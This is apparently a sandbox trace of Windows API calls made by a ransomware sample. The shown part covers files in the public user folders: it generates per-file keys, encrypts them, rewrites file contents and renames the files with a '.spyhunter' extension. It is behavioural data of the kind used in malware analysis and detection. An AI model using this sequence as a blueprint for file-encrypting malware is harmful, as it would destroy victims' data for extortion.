[0142.359] GetProcessHeap () returned 0x2c0000 [0142.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.359] GetProcessHeap () returned 0x2c0000 [0142.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.359] GetProcessHeap () returned 0x2c0000 [0142.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5ee20 | out: hHeap=0x2c0000) returned 1 [0142.360] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f080 | out: pbBuffer=0x57f080) returned 1 [0142.360] GetProcessHeap () returned 0x2c0000 [0142.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.360] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57f078*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57f078*=0x30) returned 1 [0142.360] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0142.361] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini") returned 41 [0142.361] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0142.361] GetProcessHeap () returned 0x2c0000 [0142.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0142.361] ReadFile (in: hFile=0x120, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f03c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f03c*=0x116, lpOverlapped=0x0) returned 1 [0142.362] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xfffffeea, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.362] WriteFile (in: hFile=0x120, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x116, lpNumberOfBytesWritten=0x57f03c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f03c*=0x116, lpOverlapped=0x0) returned 1 [0142.362] GetProcessHeap () returned 0x2c0000 [0142.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0142.362] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.362] WriteFile (in: hFile=0x120, lpBuffer=0x57f07c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f03c, lpOverlapped=0x0 | out: lpBuffer=0x57f07c*, lpNumberOfBytesWritten=0x57f03c*=0x4, lpOverlapped=0x0) returned 1 [0142.362] WriteFile (in: hFile=0x120, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f03c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57f03c*=0x30, lpOverlapped=0x0) returned 1 [0142.362] CloseHandle (hObject=0x120) returned 1 [0142.362] GetProcessHeap () returned 0x2c0000 [0142.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.363] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini.spyhunter") returned 51 [0142.363] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini.spyhunter" (normalized: "c:\\users\\public\\documents\\desktop.ini.spyhunter")) returned 1 [0142.363] GetProcessHeap () returned 0x2c0000 [0142.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.363] GetProcessHeap () returned 0x2c0000 [0142.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.363] GetProcessHeap () returned 0x2c0000 [0142.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0b308 | out: hHeap=0x2c0000) returned 1 [0142.364] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f080 | out: pbBuffer=0x57f080) returned 1 [0142.364] GetProcessHeap () returned 0x2c0000 [0142.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.364] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57f078*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57f078*=0x30) returned 1 [0142.364] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\.." (normalized: "c:\\users\\public"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.364] GetProcessHeap () returned 0x2c0000 [0142.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.364] GetProcessHeap () returned 0x2c0000 [0142.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30ea48 | out: hHeap=0x2c0000) returned 1 [0142.364] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f078 | out: pbBuffer=0x57f078) returned 1 [0142.364] GetProcessHeap () returned 0x2c0000 [0142.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.364] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57f070*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57f070*=0x30) returned 1 [0142.364] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\." (normalized: "c:\\users\\public\\documents\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.364] GetProcessHeap () returned 0x2c0000 [0142.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.365] GetProcessHeap () returned 0x2c0000 [0142.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f36e20 | out: hHeap=0x2c0000) returned 1 [0142.365] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f078 | out: pbBuffer=0x57f078) returned 1 [0142.365] GetProcessHeap () returned 0x2c0000 [0142.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.365] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57f070*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57f070*=0x30) returned 1 [0142.365] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\desktop.ini" (normalized: "c:\\users\\public\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0142.366] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\desktop.ini") returned 31 [0142.366] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0142.366] GetProcessHeap () returned 0x2c0000 [0142.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0142.366] ReadFile (in: hFile=0x120, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f034, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f034*=0xae, lpOverlapped=0x0) returned 1 [0142.367] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffff52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.367] WriteFile (in: hFile=0x120, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x57f034, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f034*=0xae, lpOverlapped=0x0) returned 1 [0142.367] GetProcessHeap () returned 0x2c0000 [0142.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0142.367] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.367] WriteFile (in: hFile=0x120, lpBuffer=0x57f074*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f034, lpOverlapped=0x0 | out: lpBuffer=0x57f074*, lpNumberOfBytesWritten=0x57f034*=0x4, lpOverlapped=0x0) returned 1 [0142.367] WriteFile (in: hFile=0x120, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f034, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57f034*=0x30, lpOverlapped=0x0) returned 1 [0142.367] CloseHandle (hObject=0x120) returned 1 [0142.367] GetProcessHeap () returned 0x2c0000 [0142.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.367] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\desktop.ini.spyhunter") returned 41 [0142.367] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\desktop.ini" (normalized: "c:\\users\\public\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\desktop.ini.spyhunter" (normalized: "c:\\users\\public\\desktop.ini.spyhunter")) returned 1 [0142.368] GetProcessHeap () returned 0x2c0000 [0142.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.368] GetProcessHeap () returned 0x2c0000 [0142.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.368] GetProcessHeap () returned 0x2c0000 [0142.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f36d98 | out: hHeap=0x2c0000) returned 1 [0142.369] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f070 | out: pbBuffer=0x57f070) returned 1 [0142.369] GetProcessHeap () returned 0x2c0000 [0142.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.370] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57f068*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57f068*=0x30) returned 1 [0142.370] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0142.370] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk") returned 47 [0142.370] StrStrW (lpFirst="Mozilla Firefox.lnk", lpSrch=".txt") returned 0x0 [0142.370] GetProcessHeap () returned 0x2c0000 [0142.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0142.370] ReadFile (in: hFile=0x120, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f02c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f02c*=0x485, lpOverlapped=0x0) returned 1 [0142.371] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xfffffb7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.371] WriteFile (in: hFile=0x120, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x485, lpNumberOfBytesWritten=0x57f02c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f02c*=0x485, lpOverlapped=0x0) returned 1 [0142.371] GetProcessHeap () returned 0x2c0000 [0142.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0142.371] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.371] WriteFile (in: hFile=0x120, lpBuffer=0x57f06c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f02c, lpOverlapped=0x0 | out: lpBuffer=0x57f06c*, lpNumberOfBytesWritten=0x57f02c*=0x4, lpOverlapped=0x0) returned 1 [0142.371] WriteFile (in: hFile=0x120, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f02c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57f02c*=0x30, lpOverlapped=0x0) returned 1 [0142.371] CloseHandle (hObject=0x120) returned 1 [0142.371] GetProcessHeap () returned 0x2c0000 [0142.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.371] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk.spyhunter") returned 57 [0142.371] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk.spyhunter" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk.spyhunter")) returned 1 [0142.372] GetProcessHeap () returned 0x2c0000 [0142.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.372] GetProcessHeap () returned 0x2c0000 [0142.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.372] GetProcessHeap () returned 0x2c0000 [0142.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30204e8 | out: hHeap=0x2c0000) returned 1 [0142.372] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f068 | out: pbBuffer=0x57f068) returned 1 [0142.372] GetProcessHeap () returned 0x2c0000 [0142.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.372] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57f060*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57f060*=0x30) returned 1 [0142.372] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Google Chrome.lnk" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0142.373] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Desktop\\Google Chrome.lnk") returned 45 [0142.373] StrStrW (lpFirst="Google Chrome.lnk", lpSrch=".txt") returned 0x0 [0142.373] GetProcessHeap () returned 0x2c0000 [0142.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0142.373] ReadFile (in: hFile=0x120, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f024, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f024*=0x8d1, lpOverlapped=0x0) returned 1 [0142.373] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xfffff72f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.373] WriteFile (in: hFile=0x120, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x8d1, lpNumberOfBytesWritten=0x57f024, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f024*=0x8d1, lpOverlapped=0x0) returned 1 [0142.374] GetProcessHeap () returned 0x2c0000 [0142.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0142.374] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.374] WriteFile (in: hFile=0x120, lpBuffer=0x57f064*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f024, lpOverlapped=0x0 | out: lpBuffer=0x57f064*, lpNumberOfBytesWritten=0x57f024*=0x4, lpOverlapped=0x0) returned 1 [0142.374] WriteFile (in: hFile=0x120, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f024, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57f024*=0x30, lpOverlapped=0x0) returned 1 [0142.374] CloseHandle (hObject=0x120) returned 1 [0142.374] GetProcessHeap () returned 0x2c0000 [0142.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.374] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\Google Chrome.lnk.spyhunter") returned 55 [0142.374] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Google Chrome.lnk" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Google Chrome.lnk.spyhunter" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk.spyhunter")) returned 1 [0142.375] GetProcessHeap () returned 0x2c0000 [0142.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.375] GetProcessHeap () returned 0x2c0000 [0142.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.375] GetProcessHeap () returned 0x2c0000 [0142.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3020440 | out: hHeap=0x2c0000) returned 1 [0142.375] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f068 | out: pbBuffer=0x57f068) returned 1 [0142.375] GetProcessHeap () returned 0x2c0000 [0142.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.375] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57f060*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57f060*=0x30) returned 1 [0142.375] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini" (normalized: "c:\\users\\public\\desktop\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0142.375] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini") returned 39 [0142.376] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0142.376] GetProcessHeap () returned 0x2c0000 [0142.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0142.376] ReadFile (in: hFile=0x120, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f024, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f024*=0xae, lpOverlapped=0x0) returned 1 [0142.376] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffff52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.376] WriteFile (in: hFile=0x120, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x57f024, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f024*=0xae, lpOverlapped=0x0) returned 1 [0142.376] GetProcessHeap () returned 0x2c0000 [0142.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0142.377] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.377] WriteFile (in: hFile=0x120, lpBuffer=0x57f064*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f024, lpOverlapped=0x0 | out: lpBuffer=0x57f064*, lpNumberOfBytesWritten=0x57f024*=0x4, lpOverlapped=0x0) returned 1 [0142.377] WriteFile (in: hFile=0x120, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f024, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57f024*=0x30, lpOverlapped=0x0) returned 1 [0142.377] CloseHandle (hObject=0x120) returned 1 [0142.377] GetProcessHeap () returned 0x2c0000 [0142.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.377] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini.spyhunter") returned 49 [0142.377] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini" (normalized: "c:\\users\\public\\desktop\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini.spyhunter" (normalized: "c:\\users\\public\\desktop\\desktop.ini.spyhunter")) returned 1 [0142.378] GetProcessHeap () returned 0x2c0000 [0142.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.378] GetProcessHeap () returned 0x2c0000 [0142.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.378] GetProcessHeap () returned 0x2c0000 [0142.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c147c0 | out: hHeap=0x2c0000) returned 1 [0142.378] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f060 | out: pbBuffer=0x57f060) returned 1 [0142.378] GetProcessHeap () returned 0x2c0000 [0142.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.378] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57f058*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57f058*=0x30) returned 1 [0142.378] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0142.378] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk") returned 46 [0142.379] StrStrW (lpFirst="Adobe Reader X.lnk", lpSrch=".txt") returned 0x0 [0142.379] GetProcessHeap () returned 0x2c0000 [0142.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0142.379] ReadFile (in: hFile=0x120, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f01c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f01c*=0x7e9, lpOverlapped=0x0) returned 1 [0142.379] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xfffff817, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.379] WriteFile (in: hFile=0x120, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x7e9, lpNumberOfBytesWritten=0x57f01c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f01c*=0x7e9, lpOverlapped=0x0) returned 1 [0142.380] GetProcessHeap () returned 0x2c0000 [0142.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0142.380] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.384] WriteFile (in: hFile=0x120, lpBuffer=0x57f05c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f01c, lpOverlapped=0x0 | out: lpBuffer=0x57f05c*, lpNumberOfBytesWritten=0x57f01c*=0x4, lpOverlapped=0x0) returned 1 [0142.384] WriteFile (in: hFile=0x120, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f01c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57f01c*=0x30, lpOverlapped=0x0) returned 1 [0142.384] CloseHandle (hObject=0x120) returned 1 [0142.384] GetProcessHeap () returned 0x2c0000 [0142.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.384] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk.spyhunter") returned 56 [0142.384] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk.spyhunter" (normalized: "c:\\users\\public\\desktop\\adobe reader x.lnk.spyhunter")) returned 1 [0142.385] GetProcessHeap () returned 0x2c0000 [0142.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.385] GetProcessHeap () returned 0x2c0000 [0142.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0142.385] GetProcessHeap () returned 0x2c0000 [0142.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33eed8 | out: hHeap=0x2c0000) returned 1 [0142.385] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f060 | out: pbBuffer=0x57f060) returned 1 [0142.385] GetProcessHeap () returned 0x2c0000 [0142.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0142.385] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57f058*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57f058*=0x30) returned 1 [0142.385] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\.." (normalized: "c:\\users\\public"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 